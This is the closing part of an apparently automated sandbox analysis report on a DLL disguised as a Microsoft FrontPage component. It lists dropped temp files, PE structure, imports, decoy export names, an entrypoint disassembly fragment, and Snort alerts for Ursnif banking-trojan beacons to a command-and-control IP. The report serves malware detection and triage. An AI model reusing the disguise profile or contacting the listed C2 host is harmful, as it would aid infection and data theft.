                                                SHA-512:3EC3784C8B25609F61C9B3666CAB0E669D07FFE212D7DC217A97709DE52DBE7D10A1BAC215C686A6E1A5DD0FFEEF8B78E4E368BEB3D71D889A54EB2833BD9219
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DF4449BE44FBBC2FD8.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39777
                                                Entropy (8bit):0.6008909221582213
                                                Encrypted:false
                                                SSDEEP:192:kBqoxKAuqR+FrJ4b5VaMfxxVaMfxFVaMfxK:kBqoxKAuqR+FrJ4b5bfnbfjbfo
                                                MD5:66F267F8ABDF8050856F91435A5A1EA7
                                                SHA1:6083335DEC8E20CEFB675CDBF62E310AC3DE4BA5
                                                SHA-256:1BC48D78E6DB4ACFE763BA69C946747BED0AF0ED061810111E34D03B207EE80D
                                                SHA-512:03F9E06AD14776091E0ECC77A7C0B532185147CBE3C70DC705B92C6691E48555BD92A58E106CB02C8CA2E0FFDA93EDF7E329F32FCD06CB1A219E2B148485B4C7
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DF5527FDF90770AFF0.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29989
                                                Entropy (8bit):0.3309272852524988
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw+9lwO9l24/9l2Q9laL:kBqoxKAuvScS+RP4+xAy
                                                MD5:41BCE3EFB14B44CC984665B393731115
                                                SHA1:47443CD09A1809DA78EE2B37D7BCDBBAF6644AFD
                                                SHA-256:611860995B6DFCA63B8DE9FE04AC8147FB5BAE9985F9CACDFAF4D7657D63133D
                                                SHA-512:3460CA8D51C9B24611F13A1E5F19C6F6CD41CC51FEFCBAB7FE7487C795FDF75098A8AC7099F3DE5971797F0F7CA2C963B71B67818BC1D3997DCCBC11088EA79F
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DF9BFE7BA6DBA411D3.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):19301
                                                Entropy (8bit):2.6061609517574182
                                                Encrypted:false
                                                SSDEEP:96:kBqoI8C7pZaWIWIE3EHECEXEbGCkWJ89q05I/j:kBqoI8C7faWIWIO+LeFhWJOq05I/j
                                                MD5:B9A11973AE575898BB72B8D0DF30DECF
                                                SHA1:72227A96576ACBC1E7E1B760B0AC2E3F70AE2F46
                                                SHA-256:98966BC2F1F0E82D633D765AB7087FBA5ADB6880E7FD07BE82A5F43E89103477
                                                SHA-512:DD42F618D14839F1773BF2B548D9F1A7A417C01209A5A95CC7C642C2A64BF9DE6D624746ABF71962434711C7A47212DBE61D6E14E9337FFF1AAFBA1A91051335
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DFC46C0E84A3F2638C.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39673
                                                Entropy (8bit):0.5799373823464455
                                                Encrypted:false
                                                SSDEEP:96:kBqoxKAuvScS+OIir4iOxS59OxS5lOxS5K:kBqoxKAuqR+OIir4iRhG
                                                MD5:968F1762CC7099E448EFBDCD5BCD5372
                                                SHA1:4C0F11C516044ADB9E90E39991D5FBA8301CDA57
                                                SHA-256:161C3BF0465408792C25E0D43B350ED7D836F051D71CDF43B42382DC11CA0A1F
                                                SHA-512:182F88A709BB332F0F0223822705416CFD844FB797F849CC3FDA569CFA7F33210F7C2EE848997C15D623AB74E71748BA4227E44F7E36EC9D3E74EE2CF96F2A65
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DFC4C5B676A78A1460.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29989
                                                Entropy (8bit):0.33092728525249876
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwCl9lwCF9l2CL/9l2CY:kBqoxKAuvScS+C2CwCL+CmC/y
                                                MD5:02BC709B3080A6E41719894E10F25225
                                                SHA1:0FF1957790E8ED3D27A5F191729EF333C79514A3
                                                SHA-256:5325ABD8C9B7B59B2B4CB79FFEF57B2D46216554F554C9EB0D270E947A5C8606
                                                SHA-512:1451030F59C5CA2B1D06C2C99F1D89348FA0E3936156111E0F50C88BA350CFFECB6174A200D529F69D41610384D5A68ADD4F906978F546E1028863F7D49D4FC7
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DFE529B12301E47C8A.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):34893
                                                Entropy (8bit):0.44679169142112596
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwP9lwP9l2R9l2R9l/p2:kBqoxKAuvScS+IOEVpIpyDEJhvgo86j/
                                                MD5:189D15DAFCE874E4EF4B56203F29701D
                                                SHA1:000231A1CC2D04218646164305122418E5A70623
                                                SHA-256:F3CEB7F1994F76546F030AC1A78D8D482CBAE0A0FE2C357761B79DF75B5B37D3
                                                SHA-512:22D8D7D0B1D450ABC3B5382247CEC74A5B86A3D75DD9AC579FCDE200A81655BDADAF08D1118E3BD463D7E0D6BAB93CE3E5997369ED629A27757CFF6C8896D74A
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DFE8AED9196A92F002.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29989
                                                Entropy (8bit):0.33026037405172515
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwO9lwe9l2o/9l2A9la7:kBqoxKAuvScS+hfo+BQy
                                                MD5:870ABFAA77A36A00389CB2134FE3C841
                                                SHA1:512A724D0212B467FFBA5BDC5034148349053B6A
                                                SHA-256:4DF31679F57DC5A4A6E44DCAAF9706730FB607D3670EE991377170EB44C56471
                                                SHA-512:AA9384AEE2CFEE09C060BE69F477B0478CC18B6262E862DE87C1578EA6279D6058BDA87649F48304A343491F625884B95A05FEE7546021351B9AF27D01F0971B
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DFF620ECB1EB466A17.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):196080
                                                Entropy (8bit):3.1326329377574704
                                                Encrypted:false
                                                SSDEEP:3072:vZ/2Bfcdmu5kgTzGtLZ/2Bfc+mu5kgTzGt:2I
                                                MD5:C1B9C4331E37D5DBB55D8F7CC3156C7C
                                                SHA1:B78187D611A043B389E38A44D0E42A8B95DEBAD5
                                                SHA-256:A6923658A386E2B4110E2AF96784BFC5D56E84F74E3B169A3F75DCB4F8369977
                                                SHA-512:AC1A4F5A0DD2CB6B763ADF1421AF2A942C319EEB96C7395DCAAB644D842CDCB0E0023C86E32423580A3B0722A20428090816F8DCC34BECB15CC954C4677CD7E1
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DFF7511E7F68021997.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29989
                                                Entropy (8bit):0.3304156545473839
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwme9lwmu9l2mY/9l2mO:kBqoxKAuvScS+mxmvmY+mRmgy
                                                MD5:84F1D285EC1760A5CAF51AFE8C01B85A
                                                SHA1:660E4DD61DDE2835D75A0B154293162C49C89164
                                                SHA-256:17C4887D66A466F662949F341AA9F3CFDBE7039C4C962F8BFDBAAD6FBDA9540A
                                                SHA-512:64ACA0605200C92F6E9324079ECBC5E236343866DE3E71B42324DE47D38BA18A577D6D6D1E32B93349E0F9A02C72A508229E52BD30B72D32970457B932CAB7C2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms (copy)
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5149
                                                Entropy (8bit):3.183838794552799
                                                Encrypted:false
                                                SSDEEP:48:bmdirPaI0IC9GrIoUAsASFimdirPaI0Ih683GrIoUAczbmdirPaI0Ix9GrIoUAVt:bpPaj99S0AJNpPaj+3S0A4pPaj29S0Af
                                                MD5:05FC1A57B94BA22548443982E7F842C3
                                                SHA1:0DDD60F8A850B26E9609B08E28A73E1B53F737E6
                                                SHA-256:F70317B844638C9C537B0BBCBA5C313B17C0645E43D1E926EA42CED71C5FDD22
                                                SHA-512:DE7F1031210F70FE1AF17C64F59D9FD88F32935FBA865389E2F087E0824A19145EE42E50C3817FA97BE1823C492CBCA23C7F82B4C7EEBF3A7C6CC36C4FFE7FEC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...................................FL..................F.@.. .....@.>.......q.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S......E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............3.......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T1UFLKKG48FA3WUXMTGA.temp
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5149
                                                Entropy (8bit):3.183838794552799
                                                Encrypted:false
                                                SSDEEP:48:bmdirPaI0IC9GrIoUAsASFimdirPaI0Ih683GrIoUAczbmdirPaI0Ix9GrIoUAVt:bpPaj99S0AJNpPaj+3S0A4pPaj29S0Af
                                                MD5:05FC1A57B94BA22548443982E7F842C3
                                                SHA1:0DDD60F8A850B26E9609B08E28A73E1B53F737E6
                                                SHA-256:F70317B844638C9C537B0BBCBA5C313B17C0645E43D1E926EA42CED71C5FDD22
                                                SHA-512:DE7F1031210F70FE1AF17C64F59D9FD88F32935FBA865389E2F087E0824A19145EE42E50C3817FA97BE1823C492CBCA23C7F82B4C7EEBF3A7C6CC36C4FFE7FEC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...................................FL..................F.@.. .....@.>.......q.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S......E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............3.......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYSNPJN96UYJD4Q50U0S.temp
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5149
                                                Entropy (8bit):3.183838794552799
                                                Encrypted:false
                                                SSDEEP:48:bmdirPaI0IC9GrIoUAsASFimdirPaI0Ih683GrIoUAczbmdirPaI0Ix9GrIoUAVt:bpPaj99S0AJNpPaj+3S0A4pPaj29S0Af
                                                MD5:05FC1A57B94BA22548443982E7F842C3
                                                SHA1:0DDD60F8A850B26E9609B08E28A73E1B53F737E6
                                                SHA-256:F70317B844638C9C537B0BBCBA5C313B17C0645E43D1E926EA42CED71C5FDD22
                                                SHA-512:DE7F1031210F70FE1AF17C64F59D9FD88F32935FBA865389E2F087E0824A19145EE42E50C3817FA97BE1823C492CBCA23C7F82B4C7EEBF3A7C6CC36C4FFE7FEC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...................................FL..................F.@.. .....@.>.......q.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S......E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............3.......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                Static File Info

                                                General

                                                File type:MS-DOS executable, MZ for MS-DOS
                                                Entropy (8bit):5.998813093039927
                                                TrID:
                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                • DOS Executable Generic (2002/1) 0.20%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:qT9Qk5aKTk.dll
                                                File size:243712
                                                MD5:58d9e2906f42336e9bee1137b4cf5839
                                                SHA1:7f29e42f6d317d7b11ad164a672e91e4515b5bc0
                                                SHA256:a9a0db068a2ed9c7b9b3cdbe7f3c1c82a6f9d2c1c7d4b820820927da004b6cbf
                                                SHA512:29feb57c0eaf537007a405c30975661f6e0608d46b78344f9de1c824612b8a396dad1abf00207ac7e76f83b04f4f62aae1b290ef6cc1196a83b5cea24772bec7
                                                SSDEEP:6144:tz3raG3DJCO3wVhIZhzG7WS7l8jE0DjSBj1:tDt4OtRZS7d
                                                File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.P`...........!................b........@....@........................................................................

                                                File Icon

                                                Icon Hash:aca1b2a9bab29200

                                                Static PE Info

                                                General

                                                Entrypoint:0x40bb62
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:
                                                Time Stamp:0x60500767 [Tue Mar 16 01:18:31 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34df13d9f12a151ff03a5b61c12591c

                                                Entrypoint Preview

                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 24h
                                                push esi
                                                call dword ptr [004360A4h]
                                                mov dword ptr [ebp-14h], eax
                                                mov dword ptr [ebp-18h], eax
                                                push 0000001Dh
                                                push 004387C8h
                                                push 0043E7F0h
                                                push 00000001h
                                                call dword ptr [004360ECh]
                                                mov dword ptr [ebp-18h], eax
                                                cmp eax, 00000000h
                                                jne 00007F8F50C8A0F6h
                                                mov dword ptr [ebp-10h], eax
                                                push 00000015h
                                                push 0000003Dh
                                                push dword ptr [00453FF8h]
                                                call 00007F8F50C95541h
                                                lea esi, dword ptr [00453E24h]
                                                xor esi, 068C2815h
                                                sub esi, 55h
                                                xor esi, dword ptr [00453F34h]
                                                sub esi, esi
                                                mov dword ptr [00453E24h], esi
                                                push 0000001Dh
                                                push 004387C8h
                                                push 0043E7F0h
                                                push 00000001h
                                                call dword ptr [004360ECh]
                                                mov dword ptr [00453E24h], eax
                                                cmp eax, 00000000h
                                                jne 00007F8F50C8A137h
                                                jmp 00007F8F50C89685h
                                                pop ecx
                                                pop ebp
                                                push 0000001Dh
                                                push 004387C8h
                                                push 0043E7F0h
                                                push 00000001h
                                                call dword ptr [004360ECh]
                                                mov dword ptr [ebp-0Ch], eax
                                                cmp eax, 00000000h
                                                jne 00007F8F50C89FFEh
                                                mov dword ptr [0043C210h], eax
                                                push 0000001Dh
                                                push 004387C8h
                                                push 0043E7F0h
                                                push 00000001h
                                                call dword ptr [004360ECh]
                                                cmp eax, 00000000h

                                                Data Directories

                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0xf913 | 0x610 | .text
                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a3bc | 0x78 | .data
                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5f000 | 0xa9b4 | .rsrc
                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6a000 | 0x2198 | .reloc
                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x36000 | 0xf4 | .rdata
                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                Sections

                                                 Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                 .text | 0x1000 | 0xfa15 | 0xfc00 | False | 0.502294146825 | data | 6.16505277896 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                 (nameless) | 0x11000 | 0x82 | 0x200 | False | 0.263671875 | data | 1.90933265931 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 (nameless) | 0x12000 | 0xbe | 0x200 | False | 0.36328125 | data | 2.50841842788 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 (nameless) | 0x13000 | 0xdb | 0x200 | False | 0.392578125 | data | 2.84165337483 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 (nameless) | 0x14000 | 0xaa89 | 0x200 | False | 0.400390625 | data | 2.8122785819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 (nameless) | 0x1f000 | 0xed | 0x200 | False | 0.427734375 | data | 2.99218036913 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 (nameless) | 0x20000 | 0xaa6c | 0x200 | False | 0.357421875 | data | 2.55234629154 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 (nameless) | 0x2b000 | 0xaaa8 | 0x200 | False | 0.423828125 | data | 2.88109872148 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .rdata | 0x36000 | 0xf4 | 0x200 | False | 0.28515625 | data | 2.29418780158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .data | 0x37000 | 0x279ba | 0x1d000 | False | 0.527899380388 | data | 5.29515323456 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                 .rsrc | 0x5f000 | 0xa9b4 | 0xaa00 | False | 0.405078125 | data | 5.36948542132 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .reloc | 0x6a000 | 0x2198 | 0x2200 | False | 0.801470588235 | data | 6.81021842164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                 Name | RVA | Size | Type | Language | Country
                                                 RT_ICON | 0x5f388 | 0x2e8 | data | English | United States
                                                 RT_ICON | 0x5f670 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                                                 RT_ICON | 0x5f798 | 0x1628 | dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 791621542, next used block 2795544736 | English | United States
                                                 RT_ICON | 0x60dc0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                                 RT_ICON | 0x61228 | 0x988 | data | English | United States
                                                 RT_ICON | 0x61bb0 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
                                                 RT_ICON | 0x62c58 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
                                                 RT_ICON | 0x65200 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
                                                 RT_GROUP_ICON | 0x69428 | 0x14 | data | English | United States
                                                 RT_GROUP_ICON | 0x6943c | 0x14 | data | English | United States
                                                 RT_GROUP_ICON | 0x69450 | 0x14 | data | English | United States
                                                 RT_GROUP_ICON | 0x69464 | 0x14 | data | English | United States
                                                 RT_GROUP_ICON | 0x69478 | 0x14 | data | English | United States
                                                 RT_GROUP_ICON | 0x6948c | 0x14 | data | English | United States
                                                 RT_GROUP_ICON | 0x694a0 | 0x14 | data | English | United States
                                                 RT_GROUP_ICON | 0x694b4 | 0x14 | data | English | United States
                                                 RT_VERSION | 0x694c8 | 0x4ec | data | English | United States

                                                Imports

                                                 DLL | Import
                                                 advapi32.dll | DeregisterEventSource, ReportEventW, RegCloseKey, RegisterEventSourceW, RegOpenKeyExW
                                                 dssenh.dll | CPVerifySignature
                                                 kernel32.dll | VirtualProtectEx, FindFirstFileExW, EnterCriticalSection, TlsAlloc, LCMapStringW, GetTempPathW, GetFullPathNameW, QueryPerformanceCounter, TlsSetValue, MultiByteToWideChar, SetLastError, IsProcessorFeaturePresent, GetFileAttributesExW, WideCharToMultiByte, LeaveCriticalSection, OutputDebugStringW, GetModuleHandleExW, RaiseException, GetStringTypeW, LoadLibraryExW, RemoveDirectoryW, IsWow64Process, DeleteCriticalSection, GetProcAddress, InitializeCriticalSection, SetUnhandledExceptionFilter, TlsFree, Sleep, GetModuleFileNameW, IsDebuggerPresent, LoadLibraryA, GetCurrentProcess, GetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, GetModuleHandleW, RtlUnwind, InitializeSListHead, FindNextFileW, GetEnvironmentVariableW, SwitchToThread, CreateDirectoryW, FreeLibrary, FindClose, GetCurrentProcessId
                                                 shell32.dll | ShellExecuteW
                                                 user32.dll | MessageBoxW

                                                Exports

                                                 Name | Ordinal | Address
                                                 Aquatically | 1 | 0x401d64
                                                 Episodically | 2 | 0x401f9b
                                                 Kakapo | 3 | 0x402686
                                                 Overdistantness | 4 | 0x4026c9
                                                 Pseudopodal | 5 | 0x4027af
                                                 Microphage | 6 | 0x4029d4
                                                 Cytost | 7 | 0x402dd1
                                                 Reattach | 8 | 0x402f9a
                                                 Vigia | 9 | 0x4037fe
                                                 Preallable | 10 | 0x403ac1
                                                 Amphistomous | 11 | 0x403d01
                                                 DllRegisterServer | 12 | 0x403f1f
                                                 Americanistic | 13 | 0x404150
                                                 Suprahumanity | 14 | 0x40454c
                                                 Eupyrchroite | 15 | 0x404698
                                                 Splitbeak | 16 | 0x404e58
                                                 Andirin | 17 | 0x405002
                                                 Drail | 18 | 0x4050c1
                                                 Exequatur | 19 | 0x405267
                                                 Meith | 20 | 0x405a59
                                                 Undergrow | 21 | 0x4063bb
                                                 Teaseableness | 22 | 0x4064de
                                                 Joggler | 23 | 0x406589
                                                 Swahilese | 24 | 0x4066c8
                                                 Myelinated | 25 | 0x40676a
                                                 Pyroxenic | 26 | 0x406af1
                                                 Godspeed | 27 | 0x40710b
                                                 Vigor | 28 | 0x407189
                                                 Premedieval | 29 | 0x4078e3
                                                 Papalizer | 30 | 0x40797c
                                                 Coiled | 31 | 0x407a15
                                                 Tarentala | 32 | 0x408120
                                                 Hopbush | 33 | 0x40887a
                                                 Bischofite | 34 | 0x40894f
                                                 Everliving | 35 | 0x408ab4
                                                 Mucigen | 36 | 0x408dc6
                                                 Cigarito | 37 | 0x4090a9
                                                 Cabree | 38 | 0x4091df
                                                 DllUnregisterServer | 39 | 0x409499
                                                 Unprovidenced | 40 | 0x4097e9
                                                 Arosaguntacook | 41 | 0x409880
                                                 Lysimeter | 42 | 0x40a518
                                                 Nonchokebore | 43 | 0x40aca7
                                                 Eccaleobion | 44 | 0x40af98
                                                 Gelatinously | 45 | 0x40b1ad
                                                 Tlapallan | 46 | 0x40b3aa
                                                 Amphicyrtic | 47 | 0x40b770
                                                 Alpinesque | 48 | 0x40b825
                                                 Spermatocyst | 49 | 0x40b8d4
                                                 Pseudostomous | 50 | 0x40b979
                                                 Misogynism | 51 | 0x40bb62
                                                 Delsarte | 52 | 0x40bca3
                                                 Kobird | 53 | 0x40c0f8
                                                 Dracocephalum | 54 | 0x40c4c7
                                                 Goanese | 55 | 0x40c667
                                                 Peltate | 56 | 0x40c9b9
                                                 Sturiones | 57 | 0x40cb2d
                                                 Meebos | 58 | 0x40cf4a
                                                 Cardiameter | 59 | 0x40d35c
                                                 Disguster | 60 | 0x40d620
                                                 Monobromoacetone | 61 | 0x40d6cf
                                                 Bacchanalize | 62 | 0x40d803
                                                 Azeotropism | 63 | 0x40dbf1
                                                 Holconoti | 64 | 0x40dc9d
                                                 Microgametophyte | 65 | 0x40dfaf
                                                 Crenated | 66 | 0x40e3e1
                                                 Overgratefully | 67 | 0x40e482
                                                 Prodramatic | 68 | 0x40e7ce
                                                 Uncondensableness | 69 | 0x40ea33
                                                 Disporous | 70 | 0x40eae2
                                                 Trichophore | 71 | 0x40f00e
                                                 Profluvium | 72 | 0x40f444
                                                 Unreduceable | 73 | 0x40f4f2

                                                Version Infos

                                                 Description | Data
                                                 LegalCopyright | Copyright 1995-1999 Microsoft Corporation, All rights reserved.
                                                 FileVersion | 4.0.2.7523
                                                 CompanyName | Microsoft Corporation
                                                 LegalTrademark1 | Microsoft, Windows, and FrontPage are registered trademarks of Microsoft Corporation, and WebBot is a trademark of Microsoft Corporation, in the United States and/or other countries.
                                                 ProductName | Microsoft FrontPage 2000
                                                 ProductVersion | 4.0.2.7523
                                                 FileDescription | Microsoft FrontPage Server Extensions
                                                 OriginalFilename | RPCTEST.DLL
                                                 Translation | 0x0409 0x04b0

                                                Possible Origin

                                                 Language of compilation system | Country where language is spoken
                                                 English | United States

                                                Network Behavior

                                                Snort IDS Alerts

                                                 Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                 09/10/21-11:12:31.213751 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49824 | 80 | 192.168.2.7 | 13.225.29.191
                                                 09/10/21-11:13:13.069914 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49887 | 80 | 192.168.2.7 | 13.225.29.191
